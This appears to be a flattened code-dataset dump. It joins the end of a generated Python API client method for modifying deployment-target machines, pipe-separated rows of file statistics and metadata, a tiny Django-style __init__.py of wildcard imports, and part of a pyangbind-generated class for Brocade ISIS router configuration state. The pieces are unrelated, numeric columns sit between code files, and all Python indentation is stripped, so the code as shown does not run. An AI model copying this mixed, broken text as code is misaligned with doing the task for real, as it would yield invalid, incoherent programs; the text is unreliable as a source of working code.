>>> thread = api.modify_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_spaces(base_space_id, id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str base_space_id: ID of the space (required)
:param str id: ID of the DeploymentTargetResource to modify (required)
:param DeploymentTargetResource deployment_target_resource: The DeploymentTargetResource resource to create
:return: DeploymentTargetResource
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.modify_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_spaces_with_http_info(base_space_id, id, **kwargs) # noqa: E501
else:
(data) = self.modify_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_spaces_with_http_info(base_space_id, id, **kwargs) # noqa: E501
return data
def modify_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_spaces_with_http_info(self, base_space_id, id, **kwargs): # noqa: E501
"""Modify a DeploymentTargetResource by ID # noqa: E501
Modifies an existing machine. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.modify_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_spaces_with_http_info(base_space_id, id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str base_space_id: ID of the space (required)
:param str id: ID of the DeploymentTargetResource to modify (required)
:param DeploymentTargetResource deployment_target_resource: The DeploymentTargetResource resource to create
:return: DeploymentTargetResource
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['base_space_id', 'id', 'deployment_target_resource'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method modify_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_spaces" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'base_space_id' is set
if ('base_space_id' not in params or
params['base_space_id'] is None):
raise ValueError("Missing the required parameter `base_space_id` when calling `modify_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_spaces`") # noqa: E501
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `modify_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_spaces`") # noqa: E501
collection_formats = {}
path_params = {}
if 'base_space_id' in params:
path_params['baseSpaceId'] = params['base_space_id'] # noqa: E501
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'deployment_target_resource' in params:
body_params = params['deployment_target_resource']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'APIKeyQuery', 'NugetApiKeyHeader'] # noqa: E501
return self.api_client.call_api(
'/api/{baseSpaceId}/machines/{id}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DeploymentTargetResource', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 49.42825
| 271
| 0.681103
| 10,214
| 87,834
| 5.48786
| 0.022322
| 0.036394
| 0.026493
| 0.052022
| 0.99083
| 0.99083
| 0.99083
| 0.988796
| 0.988796
| 0.988796
| 0
| 0.012224
| 0.246545
| 87,834
| 1,776
| 272
| 49.456081
| 0.834766
| 0.349238
| 0
| 0.834369
| 1
| 0
| 0.226156
| 0.114173
| 0
| 0
| 0
| 0
| 0
| 1
| 0.038302
| false
| 0
| 0.004141
| 0
| 0.099379
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
c78ddebab9e0a541b68783c4bc0978f9e9e4660a
| 88
|
py
|
Python
|
waddleadmin/helpers/__init__.py
|
ababic/waddleadmin
|
9994915eac86299e16242ad5acca7ca0e6c78da7
|
[
"MIT"
] | 1
|
2019-04-23T17:56:26.000Z
|
2019-04-23T17:56:26.000Z
|
waddleadmin/helpers/__init__.py
|
ababic/waddleadmin
|
9994915eac86299e16242ad5acca7ca0e6c78da7
|
[
"MIT"
] | null | null | null |
waddleadmin/helpers/__init__.py
|
ababic/waddleadmin
|
9994915eac86299e16242ad5acca7ca0e6c78da7
|
[
"MIT"
] | null | null | null |
from .url import * # noqa
from .permission import * # noqa
from .button import * # noqa
| 22
| 32
| 0.693182
| 12
| 88
| 5.083333
| 0.5
| 0.491803
| 0.459016
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.204545
| 88
| 3
| 33
| 29.333333
| 0.871429
| 0.159091
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
c7a8a1dae4386a8dea09a2f2e338a237443647f1
| 122,714
|
py
|
Python
|
pybind/slxos/v16r_1_00b/isis_state/router_isis_config/__init__.py
|
shivharis/pybind
|
4e1c6d54b9fd722ccec25546ba2413d79ce337e6
|
[
"Apache-2.0"
] | null | null | null |
pybind/slxos/v16r_1_00b/isis_state/router_isis_config/__init__.py
|
shivharis/pybind
|
4e1c6d54b9fd722ccec25546ba2413d79ce337e6
|
[
"Apache-2.0"
] | null | null | null |
pybind/slxos/v16r_1_00b/isis_state/router_isis_config/__init__.py
|
shivharis/pybind
|
4e1c6d54b9fd722ccec25546ba2413d79ce337e6
|
[
"Apache-2.0"
] | 1
|
2021-11-05T22:15:42.000Z
|
2021-11-05T22:15:42.000Z
|
from operator import attrgetter
import pyangbind.lib.xpathhelper as xpathhelper
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType, RestrictedClassType, TypedListType
from pyangbind.lib.yangtypes import YANGBool, YANGListType, YANGDynClass, ReferenceType
from pyangbind.lib.base import PybindBase
from decimal import Decimal
from bitarray import bitarray
import __builtin__
import isis_system_info
import log_handler
import is_address_family_v4
import is_address_family_v6
import reverse_metric
import debug_handler
import l1_auth_profile
import l2_auth_profile
import l1_spf_timer
import l2_spf_timer
import l1_spf6_timer
import l2_spf6_timer
import pspf_timer
import pspf6_timer
class router_isis_config(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module brocade-isis-operational - based on the path /isis-state/router-isis-config. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: ISIS Global configuration summary
"""
__slots__ = ('_pybind_generated_by', '_path_helper', '_yang_name', '_rest_name', '_extmethods', '__nsr_state','__lsp_flood_count','__lsp_fast_flood_count','__fast_flood_wait_count','__hello_padding','__hello_padding_ptp','__csnp_interval','__lsp_gen_interval','__lsp_interval','__lsp_refresh_interval','__lsp_lifetime','__retransmit_interval','__pspf_enabled','__ispf_enabled','__istct_spf_enabled','__overload_state','__overload_startup_time','__overload_wait_on_bgp','__overload_bgp_wait_time','__enable_code_assertions','__graceful_restart_helper','__isis_hostname_enabled','__isis_system_info','__log_handler','__is_address_family_v4','__is_address_family_v6','__reverse_metric','__debug_handler','__l1_auth_profile','__l2_auth_profile','__l1_spf_timer','__l2_spf_timer','__l1_spf6_timer','__l2_spf6_timer','__pspf_timer','__pspf6_timer',)
_yang_name = 'router-isis-config'
_rest_name = 'router-isis-config'
_pybind_generated_by = 'container'
def __init__(self, *args, **kwargs):
path_helper_ = kwargs.pop("path_helper", None)
if path_helper_ is False:
self._path_helper = False
elif path_helper_ is not None and isinstance(path_helper_, xpathhelper.YANGPathHelper):
self._path_helper = path_helper_
elif hasattr(self, "_parent"):
path_helper_ = getattr(self._parent, "_path_helper", False)
self._path_helper = path_helper_
else:
self._path_helper = False
extmethods = kwargs.pop("extmethods", None)
if extmethods is False:
self._extmethods = False
elif extmethods is not None and isinstance(extmethods, dict):
self._extmethods = extmethods
elif hasattr(self, "_parent"):
extmethods = getattr(self._parent, "_extmethods", None)
self._extmethods = extmethods
else:
self._extmethods = False
self.__ispf_enabled = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'is-enabled': {'value': 1}, u'is-disabled': {'value': 0}},), is_leaf=True, yang_name="ispf-enabled", rest_name="ispf-enabled", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='isis-status', is_config=False)
self.__overload_bgp_wait_time = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="overload-bgp-wait-time", rest_name="overload-bgp-wait-time", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='uint32', is_config=False)
self.__fast_flood_wait_count = YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="fast-flood-wait-count", rest_name="fast-flood-wait-count", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='uint16', is_config=False)
self.__l1_spf6_timer = YANGDynClass(base=l1_spf6_timer.l1_spf6_timer, is_container='container', presence=False, yang_name="l1-spf6-timer", rest_name="l1-spf6-timer", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'isis-spf-timer-l1-spf6-timer-1'}}, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='container', is_config=False)
self.__lsp_interval = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="lsp-interval", rest_name="lsp-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='uint32', is_config=False)
self.__debug_handler = YANGDynClass(base=debug_handler.debug_handler, is_container='container', presence=False, yang_name="debug-handler", rest_name="debug-handler", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'isis-debugger', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='container', is_config=False)
self.__reverse_metric = YANGDynClass(base=reverse_metric.reverse_metric, is_container='container', presence=False, yang_name="reverse-metric", rest_name="reverse-metric", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'isis-reverse-metric-global', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='container', is_config=False)
self.__overload_state = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'is-enabled': {'value': 1}, u'is-disabled': {'value': 0}},), is_leaf=True, yang_name="overload-state", rest_name="overload-state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='isis-status', is_config=False)
self.__is_address_family_v6 = YANGDynClass(base=is_address_family_v6.is_address_family_v6, is_container='container', presence=False, yang_name="is-address-family-v6", rest_name="is-address-family-v6", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'isis-address-family-v6', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='container', is_config=False)
self.__retransmit_interval = YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="retransmit-interval", rest_name="retransmit-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='uint16', is_config=False)
self.__l2_spf6_timer = YANGDynClass(base=l2_spf6_timer.l2_spf6_timer, is_container='container', presence=False, yang_name="l2-spf6-timer", rest_name="l2-spf6-timer", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'isis-spf-timer-l2-spf6-timer-1'}}, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='container', is_config=False)
self.__lsp_fast_flood_count = YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="lsp-fast-flood-count", rest_name="lsp-fast-flood-count", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='uint16', is_config=False)
self.__overload_startup_time = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="overload-startup-time", rest_name="overload-startup-time", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='uint32', is_config=False)
self.__csnp_interval = YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="csnp-interval", rest_name="csnp-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='uint16', is_config=False)
self.__istct_spf_enabled = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'is-enabled': {'value': 1}, u'is-disabled': {'value': 0}},), is_leaf=True, yang_name="istct-spf-enabled", rest_name="istct-spf-enabled", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='isis-status', is_config=False)
self.__lsp_flood_count = YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="lsp-flood-count", rest_name="lsp-flood-count", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='uint16', is_config=False)
self.__nsr_state = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'is-enabled': {'value': 1}, u'is-disabled': {'value': 0}},), is_leaf=True, yang_name="nsr-state", rest_name="nsr-state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='isis-status', is_config=False)
self.__l2_auth_profile = YANGDynClass(base=l2_auth_profile.l2_auth_profile, is_container='container', presence=False, yang_name="l2-auth-profile", rest_name="l2-auth-profile", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'isis-authentication-profile-l2-auth-profile-1'}}, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='container', is_config=False)
self.__overload_wait_on_bgp = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'is-enabled': {'value': 1}, u'is-disabled': {'value': 0}},), is_leaf=True, yang_name="overload-wait-on-bgp", rest_name="overload-wait-on-bgp", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='isis-status', is_config=False)
self.__lsp_gen_interval = YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="lsp-gen-interval", rest_name="lsp-gen-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='uint16', is_config=False)
self.__lsp_refresh_interval = YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="lsp-refresh-interval", rest_name="lsp-refresh-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='uint16', is_config=False)
self.__lsp_lifetime = YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="lsp-lifetime", rest_name="lsp-lifetime", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='uint16', is_config=False)
self.__isis_hostname_enabled = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'is-enabled': {'value': 1}, u'is-disabled': {'value': 0}},), is_leaf=True, yang_name="isis-hostname-enabled", rest_name="isis-hostname-enabled", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='isis-status', is_config=False)
self.__hello_padding = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'is-enabled': {'value': 1}, u'is-disabled': {'value': 0}},), is_leaf=True, yang_name="hello-padding", rest_name="hello-padding", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='isis-status', is_config=False)
self.__isis_system_info = YANGDynClass(base=isis_system_info.isis_system_info, is_container='container', presence=False, yang_name="isis-system-info", rest_name="isis-system-info", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'isis-system-info', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='container', is_config=False)
self.__graceful_restart_helper = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'is-enabled': {'value': 1}, u'is-disabled': {'value': 0}},), is_leaf=True, yang_name="graceful-restart-helper", rest_name="graceful-restart-helper", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='isis-status', is_config=False)
self.__pspf_timer = YANGDynClass(base=pspf_timer.pspf_timer, is_container='container', presence=False, yang_name="pspf-timer", rest_name="pspf-timer", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'isis-spf-timer-pspf-timer-1'}}, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='container', is_config=False)
self.__is_address_family_v4 = YANGDynClass(base=is_address_family_v4.is_address_family_v4, is_container='container', presence=False, yang_name="is-address-family-v4", rest_name="is-address-family-v4", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'isis-address-family-v4', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='container', is_config=False)
self.__enable_code_assertions = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'is-enabled': {'value': 1}, u'is-disabled': {'value': 0}},), is_leaf=True, yang_name="enable-code-assertions", rest_name="enable-code-assertions", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='isis-status', is_config=False)
self.__l1_auth_profile = YANGDynClass(base=l1_auth_profile.l1_auth_profile, is_container='container', presence=False, yang_name="l1-auth-profile", rest_name="l1-auth-profile", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'isis-authentication-profile-l1-auth-profile-1'}}, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='container', is_config=False)
self.__l2_spf_timer = YANGDynClass(base=l2_spf_timer.l2_spf_timer, is_container='container', presence=False, yang_name="l2-spf-timer", rest_name="l2-spf-timer", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'isis-spf-timer-l2-spf-timer-1'}}, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='container', is_config=False)
self.__hello_padding_ptp = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'is-enabled': {'value': 1}, u'is-disabled': {'value': 0}},), is_leaf=True, yang_name="hello-padding-ptp", rest_name="hello-padding-ptp", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='isis-status', is_config=False)
self.__l1_spf_timer = YANGDynClass(base=l1_spf_timer.l1_spf_timer, is_container='container', presence=False, yang_name="l1-spf-timer", rest_name="l1-spf-timer", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'isis-spf-timer-l1-spf-timer-1'}}, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='container', is_config=False)
self.__log_handler = YANGDynClass(base=log_handler.log_handler, is_container='container', presence=False, yang_name="log-handler", rest_name="log-handler", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'isis-logger', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='container', is_config=False)
self.__pspf6_timer = YANGDynClass(base=pspf6_timer.pspf6_timer, is_container='container', presence=False, yang_name="pspf6-timer", rest_name="pspf6-timer", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'isis-spf-timer-pspf6-timer-1'}}, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='container', is_config=False)
self.__pspf_enabled = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'is-enabled': {'value': 1}, u'is-disabled': {'value': 0}},), is_leaf=True, yang_name="pspf-enabled", rest_name="pspf-enabled", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='isis-status', is_config=False)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path()+[self._yang_name]
else:
return [u'isis-state', u'router-isis-config']
def _rest_path(self):
if hasattr(self, "_parent"):
if self._rest_name:
return self._parent._rest_path()+[self._rest_name]
else:
return self._parent._rest_path()
else:
return [u'isis-state', u'router-isis-config']
def _get_nsr_state(self):
"""
Getter method for nsr_state, mapped from YANG variable /isis_state/router_isis_config/nsr_state (isis-status)
YANG Description: If Non-stop routing enabled
"""
return self.__nsr_state
def _set_nsr_state(self, v, load=False):
"""
Setter method for nsr_state, mapped from YANG variable /isis_state/router_isis_config/nsr_state (isis-status)
If this variable is read-only (config: false) in the
source YANG file, then _set_nsr_state is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_nsr_state() directly.
YANG Description: If Non-stop routing enabled
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'is-enabled': {'value': 1}, u'is-disabled': {'value': 0}},), is_leaf=True, yang_name="nsr-state", rest_name="nsr-state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='isis-status', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """nsr_state must be of a type compatible with isis-status""",
'defined-type': "brocade-isis-operational:isis-status",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'is-enabled': {'value': 1}, u'is-disabled': {'value': 0}},), is_leaf=True, yang_name="nsr-state", rest_name="nsr-state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='isis-status', is_config=False)""",
})
self.__nsr_state = t
if hasattr(self, '_set'):
self._set()
def _unset_nsr_state(self):
self.__nsr_state = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'is-enabled': {'value': 1}, u'is-disabled': {'value': 0}},), is_leaf=True, yang_name="nsr-state", rest_name="nsr-state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='isis-status', is_config=False)
def _get_lsp_flood_count(self):
"""
Getter method for lsp_flood_count, mapped from YANG variable /isis_state/router_isis_config/lsp_flood_count (uint16)
YANG Description: Number of LSPS can be transmitted in 100msec
"""
return self.__lsp_flood_count
def _set_lsp_flood_count(self, v, load=False):
"""
Setter method for lsp_flood_count, mapped from YANG variable /isis_state/router_isis_config/lsp_flood_count (uint16)
If this variable is read-only (config: false) in the
source YANG file, then _set_lsp_flood_count is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_lsp_flood_count() directly.
YANG Description: Number of LSPS can be transmitted in 100msec
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="lsp-flood-count", rest_name="lsp-flood-count", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='uint16', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """lsp_flood_count must be of a type compatible with uint16""",
'defined-type': "uint16",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="lsp-flood-count", rest_name="lsp-flood-count", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='uint16', is_config=False)""",
})
self.__lsp_flood_count = t
if hasattr(self, '_set'):
self._set()
def _unset_lsp_flood_count(self):
self.__lsp_flood_count = YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="lsp-flood-count", rest_name="lsp-flood-count", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='uint16', is_config=False)
def _get_lsp_fast_flood_count(self):
"""
Getter method for lsp_fast_flood_count, mapped from YANG variable /isis_state/router_isis_config/lsp_fast_flood_count (uint16)
YANG Description: Number of LSPs to be flooded before SPF run
"""
return self.__lsp_fast_flood_count
def _set_lsp_fast_flood_count(self, v, load=False):
"""
Setter method for lsp_fast_flood_count, mapped from YANG variable /isis_state/router_isis_config/lsp_fast_flood_count (uint16)
If this variable is read-only (config: false) in the
source YANG file, then _set_lsp_fast_flood_count is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_lsp_fast_flood_count() directly.
YANG Description: Number of LSPs to be flooded before SPF run
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="lsp-fast-flood-count", rest_name="lsp-fast-flood-count", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='uint16', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """lsp_fast_flood_count must be of a type compatible with uint16""",
'defined-type': "uint16",
